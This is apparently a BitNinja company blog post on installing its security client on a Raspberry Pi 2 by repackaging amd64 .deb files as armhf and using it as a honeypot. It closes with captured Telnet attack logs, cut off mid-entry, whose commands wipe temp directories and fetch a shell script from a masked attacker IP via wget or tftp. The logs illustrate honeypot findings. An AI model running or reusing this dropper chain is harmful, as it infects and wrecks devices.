The real geek escaped from one Ninjastic developer of ours lately, and in his freetime he decided to try to install BitNinja on his Raspberry Pi 2 model B. And guess what happened? He was successful! What is more, BitNinja also captured some attacks with its port honeypot module. Now, let me describe you the process of the installation and what he exactly found.
So the tool is Raspberry Pi 2 model B, and he uses Linux: Raspbian GNU/Linux 8 on it.
The process:
Bitninja is not available for arm architecture, so he was not able to install it from the Bitninja debian repository. To by-pass this issue, he downloaded the packages from the repository:
wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja-dojo/bitninja-dojo_LATEST_VERSION_amd64.deb
wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja/bitninja_LATEST_VERSION_amd64.deb
„bitninja” is the client itself
„bitninja-dojo” is a standalone PHP executable
He started with the „bitninja” package, as the „bitninja-dojo”’s operation depends on the former one.
1, Create a directory for it
mkdir bitninja-dojo_armhf
2, Move the downloaded .deb file into the directory
mv bitninja-dojo_LATEST_VERSION_amd64.deb bitninja-dojo_armhf/bitninja-dojo_amd64.deb
3, Open the directory
cd bitninja-dojo_armhf
4, Unzip the .deb file with this command:
ar vx bitninja-dojo_amd64.deb
5, Delete it
rm bitninja-dojo_LATEST_VERSION_amd64.deb
After unzipping, we get 3 files
debian-binary
data.tar.gz –>contains all data in the package
control.tar.gz–>this zipped file contains the dependence of the package and the step by step instructions of the installation
6, Create a new directory
mkdir control
7, Move the control.tar.gz to the new directory and open it
mv control.tar.gz control/
cd control
8, Unzip it
tar -zxvf control.tar.gz
9, Delete the zipped file
rm control.tar.gz
10, After this, you need to create the following:
mcedit control
11, Find the following line and rename it
This:
Architecture: amd64
To this:
Architecture: armhf
12, Save it
13, Check the dependence of the package (in the control file):
Depends: libc6 (>= 2.11), zlib1g (>= 1:1.1.4)
So, it depends on two packages: libc6 és a zlib1g
As it is not defined, which architecture the package should originate from, so it should get them from one of the directories during the installation.
Just to make sure it works 100%, he installed them beforehand.a
pt-get update
apt-get install libc6 zlib1g
14, Now, it is time to condense the conent of the control file
tar czf control.tar.gz *
15, Move it outward, and go one shell back:
mv control.tar.gz ../
cd ..
16, delete the control directory
rm -r control
17, it is time to repackage 3 source files into 1 .deb file
ar r bitninja-dojo_armhf.deb debian-binary control.tar.gz data.tar.gz
18, You can install it with this command:
dpkg -i bitninja-dojo_armhf.deb
As a matter of fact, we only had to modify the architecture, nothing else.
With the BitNinja package, you should follow the same steps as in the case of the BitNinja-dojo
19, Repeat the steps from 1 to 12 than check the dependence of the Bitninja file
Depends: bitninja-dojo (>= 1.6), ipset, daemon, iptables (>= 1.4.7), awk, net-tools, grep, gzip, sed, coreutils, lsb-release
As the BitNinja dojo is already installed, we only need to work with the other dependencies.
As he mentioned, the package should download the dependencies with itself. As he installed them for himself, he was not sure if it will work for the bitninja, as he had some issues with the awk package. :
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package awk is a virtual package provided by:
original-awk 2012-12-20-2
mawk 1.3.3-17
gawk 1:4.1.1+dfsg-1
You should explicitly select one to install.
E: Package ‘awk’ has no installation candidate
Instead of this, he installed gawk
20, The whole command:
apt-get install ipset daemon iptables gawk net-tools grep gzip sed coreutils lsb-release
21, Follow the steps from 14 to 18
If you have done everything correctly, now the BitNinja is installed on your Raspberry, although, for now it will not start yet. The BitNinja client does not use php package, but it runs the php code with a standalone binary. This is the bitninja-dojo. He though, it is probable that the binary is dependable on the architexture. (/opt/bitninja-dojo/run/bin/bitninja-dojo).
However, it is easily readable, as the php’s binary is similar and also available on the raspberry.
22, Install the php5 with curl
apt-get install php5 php5-curl
23, change the bitninja-dojo with the php5 executable at the following places:
/opt/bitninja/bitninja
/usr/sbin/bitninja-config
/usr/sbin/bitninjacli
this line:
#! /opt/bitninja-dojo/run/bin/bitninja-dojo -c=/opt/bitninja/etc
to this:
#!/usr/bin/php --php-ini=/opt/bitninja/etc
24, Set the license-keyt:
bitninja-config --set license_key=LICENSE_KEY
25, start the BitNinja:
/etc/init.d/bitninja start
For him, the BitNinja runs smoothly on his server. The load is between 1,5 and 2,0.
If you would like to catch some bad guys with your Raspberry Pi , do the following settings:
Set your raspberry’s internal IP at the router’s DMZ (demilitarized zone) settings, and you can start the hunting. 🙂
Our developer encountered with the following Telnet attacks:
“PORT HIT”: “xxx.xx.xxx.xx:46376->192.168.1.93:23″,
“MESSAGES”: “Array
(
=> sh || bash || shell
=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r bi2.sh -g xxx.xx.xxx.xxx || tftp -r bi2.sh -g xxx.xx.xxx.xxx || busybox tftp xxx.xx.xxx.xxx
=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r